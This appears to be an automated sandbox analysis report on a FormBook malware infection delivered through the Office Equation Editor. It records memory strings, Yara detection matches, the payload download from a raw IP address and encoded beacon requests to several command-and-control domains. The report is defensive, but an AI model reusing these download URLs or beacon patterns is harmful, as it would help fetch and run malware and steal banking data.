Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25

Source: explorer.exe, 00000006.00000000.543228196.0000000002AE0000.00000002.00020000.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: explorer.exe, 00000006.00000000.498308172.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.543228196.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.543228196.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.542019759.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000006.00000000.487124317.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.487124317.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, vbc.exe, 00000004.00000000.463068973.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000005.00000000.466962477.0000000000409000.00000008.00020000.sdmp, vbc.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: vbc.exe, 00000004.00000000.463068973.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000005.00000000.466962477.0000000000409000.00000008.00020000.sdmp, vbc.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: vbc.exe, 00000004.00000002.474694873.0000000001EC0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.478152663.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.489138123.0000000003E50000.00000002.00020000.sdmp, cmd.exe, 00000008.00000002.514802576.0000000001C60000.00000002.00020000.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.487124317.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.498308172.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.498308172.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.487124317.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000004.00000002.474694873.0000000001EC0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.478152663.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.542019759.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000006.00000000.498308172.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.543228196.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.487124317.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.498308172.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.546883814.0000000007329000.00000004.00000001.sdmp	String found in binary or memory: http://www.mozilla.com0
Source: explorer.exe, 00000006.00000000.543228196.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.489880080.0000000004513000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.482100672.00000000045D6000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.482100672.00000000045D6000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerp
Source: explorer.exe, 00000006.00000000.543228196.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.542019759.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://support.mozilla.org
Source: NETSTAT.EXE, 00000007.00000002.666910547.0000000002962000.00000004.00020000.sdmp	String found in binary or memory: https://www.metanetgateway.com/ddzw/
Source: NETSTAT.EXE, 00000007.00000002.666910547.0000000002962000.00000004.00020000.sdmp	String found in binary or memory: https://www.metanetgateway.com/ddzw/?h2Mdq=CC4eYJ6GdM3g7jV/74DGeVNO7dTe5083KAYqQjLLOiGFZCFwrjOGC7P0J
Source: explorer.exe, 00000006.00000000.542019759.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000006.00000000.542019759.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3AC55E10.emf

Jump to behavior

Source: unknown

DNS traffic detected: queries for: www.spacex-live.net

Source: global traffic	HTTP traffic detected: GET /8880/vbc.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.232.53.25Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ddzw/?h2Mdq=Z+FzwJtUDkwgABdyd+p8UeqxtpX8YY+y3UFx7cJDGSHChxct3TL8QRd2MFxOEFehDmKc8w==&_x=gVp0dvG0DtZT6do0 HTTP/1.1Host: www.spacex-live.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ddzw/?h2Mdq=eu2i37xABBm77RmOTVlK/UzsyDYSkffg03LYHul4MxZENkm7/tK6Jp9Y8VUWWe4q58P2rA==&_x=gVp0dvG0DtZT6do0 HTTP/1.1Host: www.schittstore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ddzw/?h2Mdq=CC4eYJ6GdM3g7jV/74DGeVNO7dTe5083KAYqQjLLOiGFZCFwrjOGC7P0JmGnSxw4GGM5lA==&_x=gVp0dvG0DtZT6do0 HTTP/1.1Host: www.metanetgateway.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ddzw/?h2Mdq=iXrnxWa2MIQCLF3pcDg6+qoW1dWPNK8gD+C0AcHvSyjXkMlp/HpcZgrhMm+aOjdhifJKjg==&_x=gVp0dvG0DtZT6do0 HTTP/1.1Host: www.sarahannsartstudio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.2f90000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.2f90000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000000.469999141.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.507748389.00000000002F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.472000936.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.493026638.0000000009725000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.666335831.00000000003A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.469326544.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.476798938.0000000002F90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.507790702.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.499945438.0000000009725000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.507885297.0000000000700000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.666274023.0000000000240000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.2f90000.4.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.2f90000.4.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.2f90000.4.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.2f90000.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.469999141.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.469999141.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.507748389.00000000002F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.507748389.00000000002F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000001.472000936.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000001.472000936.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.493026638.0000000009725000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.493026638.0000000009725000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.666335831.00000000003A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.666335831.00000000003A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.469326544.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.469326544.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.476798938.0000000002F90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.476798938.0000000002F90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.507790702.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.507790702.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.499945438.0000000009725000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.499945438.0000000009725000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.507885297.0000000000700000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.507885297.0000000000700000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.666274023.0000000000240000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.666274023.0000000000240000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.2f90000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.2f90000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.2f90000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.2f90000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.469999141.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.469999141.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.507748389.00000000002F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.507748389.00000000002F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000001.472000936.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000001.472000936.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.493026638.0000000009725000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.493026638.0000000009725000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.666335831.00000000003A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.666335831.00000000003A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.469326544.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.469326544.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
